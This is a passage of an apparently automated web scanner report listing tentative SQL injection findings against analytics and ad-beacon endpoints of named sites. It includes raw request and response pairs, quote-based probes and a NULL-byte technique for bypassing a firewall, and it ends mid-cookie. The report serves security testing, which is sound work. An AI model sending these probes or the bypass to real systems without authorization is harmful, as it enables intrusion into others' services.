NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s45199479965958?[AQB]&ndh=1&t=16/5/2011%2013%3A11%3A50%204%20300&ce=UTF-8&ns=nbcuniversal&pageName=Story%7CNews%7CUS%20News%7C43422860%7CEnergy%20Transfer%20to%20Buy%20Southern%20Union%20for%20%244.4%20Bil&g=http%3A//www.cnbc.com/id/43422860&r=http%3A//www.cnbc.com/id/43422860&cc=USD&ch=free%3A%20cnbc.com&server=www.cnbc.com&events=event6&v1=New&h1=cnbc%7Ccnbc.com%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&h2=miscellaneous%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%7Cmiscellaneous%7Cmiscellaneous&h3=www.cnbc.com%7Cid%7C43422860&c6=http%3A//www.cnbc.com/id/43422860&c8=cnbc&c9=cnbc.com&c10=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c11=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%20%7C%2043422860&c12=cnbc.com%20%7C%20Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c13=New&c25=2%3A00PM&c29=Thursday&c30=Weekday&c31=News&c32=US%20News&c33=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c36=43422860&c37=Story&c38=NoPic&c39=The%20Associated%20Press&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: oimg.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF408051D011F-4000010B6001F0EB[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 18:23:44 GMT
Server: Omniture DC/2.0.0
Content-Length: 397
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s45199479965958?[AQB]&ndh=1&t=16/5/2011%2013%3A11%3A50%204%20300&ce=UTF-8&ns=nbcuniversal&pageName=Story%7CNews%7CUS%20News%7C43422860%7CEnergy%20Transfer%20to%20Buy%20Southern%20Union%20for%20%244.4%20Bil&g=http%3A//www.cnbc.com/id/43422860&r=http%3A//www.cnbc.com/id/43422860&cc=USD&ch=free%3A%20cnbc.com&server=www.cnbc.com&events=event6&v1=New&h1=cnbc%7Ccnbc.com%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&h2=miscellaneous%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%7Cmiscellaneous%7Cmiscellaneous&h3=www.cnbc.com%7Cid%7C43422860&c6=http%3A//www.cnbc.com/id/43422860&c8=cnbc&c9=cnbc.com&c10=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c11=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%20%7C%2043422860&c12=cnbc.com%20%7C%20Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c13=New&c25=2%3A00PM&c29=Thursday&c30=Weekday&c31=News&c32=US%20News&c33=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c36=43422860&c37=Story&c38=NoPic&c39=The%20Associated%20Press&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: oimg.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF408051D011F-4000010B6001F0EB[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 18:23:44 GMT
Server: Omniture DC/2.0.0
xserver: www369
Content-Length: 0
Content-Type: text/html


1.10. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s19508665378671 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://om.dowjoneson.com
Path:   /b/ss/djglobal,djwsj/1/H.20.3/s19508665378671

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/djglobal,djwsj/1%00'/H.20.3/s19508665378671?AQB=1&ndh=1&t=16/5/2011%206%3A22%3A20%204%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_U.S.%20Home_0_0_WH_0001_public&g=http%3A//online.wsj.com/home-page&cc=USD&ch=Online%20Journal&server=online.wsj.com&events=event12%2Cevent17%2Cevent64&c1=Home&h1=Online%20Journal%2CHome%2CWSJ_Home%20Page%20Public%2CWSJ_U.S.%20Home_0_0_WH_0001_public%2Chttp%3A//online.wsj.com/home-page&c2=WSJ_Home%20Page%20Public&h2=Online%20Journal%2Chome%20page%2CWSJ_Home%20Page%20Public%2CWSJ_Home_U.S.%20Home_0_0_WH_0001_public&c3=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&h3=Online%20Journal%2CWSJ_Home%20Page%20Public%2CWSJ_Home%20Page%20Public%2CWSJ_U.S.%20Home_0_0_WH_0001_public&v4=WSJ_U.S.%20Home_0_0_WH_0001_public&h4=Online%20Journal%2CWSJ_Home%20Page%20Public%2CHome&c5=http%3A//online.wsj.com/home-page&h5=Online%20Journal%2CEdition_North_America_USA%2CHome%2CWSJ_Home%20Page%20Public%2CWSJ_Home%20Page%20Public&c6=http%3A//online.wsj.com/home-page&c7=off&c8=WSJ%20Online&c9=free&v11=Online%20Journal&c13=undefined&c19=home%20page&c20=0_0_WH_0001_public&c22=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&c24=Edition_North_America_USA&v25=WSJ_Home%20Page%20Public&c26=WSJ_Home%20Page%20Public&c27=WSJ_free&v29=WSJ_Home%20Page%20Public&v31=Thursday&v32=6%3A00&v37=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&c49=2&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:40:50 GMT
Server: Omniture DC/2.0.0
Content-Length: 416
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/djglobal,djwsj/1 was not found on this server.<
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/djglobal,djwsj/1%00''/H.20.3/s19508665378671?AQB=1&ndh=1&t=16/5/2011%206%3A22%3A20%204%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_U.S.%20Home_0_0_WH_0001_public&g=http%3A//online.wsj.com/home-page&cc=USD&ch=Online%20Journal&server=online.wsj.com&events=event12%2Cevent17%2Cevent64&c1=Home&h1=Online%20Journal%2CHome%2CWSJ_Home%20Page%20Public%2CWSJ_U.S.%20Home_0_0_WH_0001_public%2Chttp%3A//online.wsj.com/home-page&c2=WSJ_Home%20Page%20Public&h2=Online%20Journal%2Chome%20page%2CWSJ_Home%20Page%20Public%2CWSJ_Home_U.S.%20Home_0_0_WH_0001_public&c3=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&h3=Online%20Journal%2CWSJ_Home%20Page%20Public%2CWSJ_Home%20Page%20Public%2CWSJ_U.S.%20Home_0_0_WH_0001_public&v4=WSJ_U.S.%20Home_0_0_WH_0001_public&h4=Online%20Journal%2CWSJ_Home%20Page%20Public%2CHome&c5=http%3A//online.wsj.com/home-page&h5=Online%20Journal%2CEdition_North_America_USA%2CHome%2CWSJ_Home%20Page%20Public%2CWSJ_Home%20Page%20Public&c6=http%3A//online.wsj.com/home-page&c7=off&c8=WSJ%20Online&c9=free&v11=Online%20Journal&c13=undefined&c19=home%20page&c20=0_0_WH_0001_public&c22=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&c24=Edition_North_America_USA&v25=WSJ_Home%20Page%20Public&c26=WSJ_Home%20Page%20Public&c27=WSJ_free&v29=WSJ_Home%20Page%20Public&v31=Thursday&v32=6%3A00&v37=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&c49=2&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:40:50 GMT
Server: Omniture DC/2.0.0
xserver: www438
Content-Length: 0
Content-Type: text/html


1.11. http://r.turn.com/r/beacon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid=&1'=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr36hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:44 GMT; Path=/
Set-Cookie: pf=HI1kW9dDuzsAawNB3xfEnPgJlEfmrZSLb2NQk53Jdt9pZRM3I2Ow27XFAiLSy6gtZDpM35cC-2bkiEEmtUQhePVJa14KJhbEu9o3nKnVB4nX05cOjEpT2HyHBma2S3H4q-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSC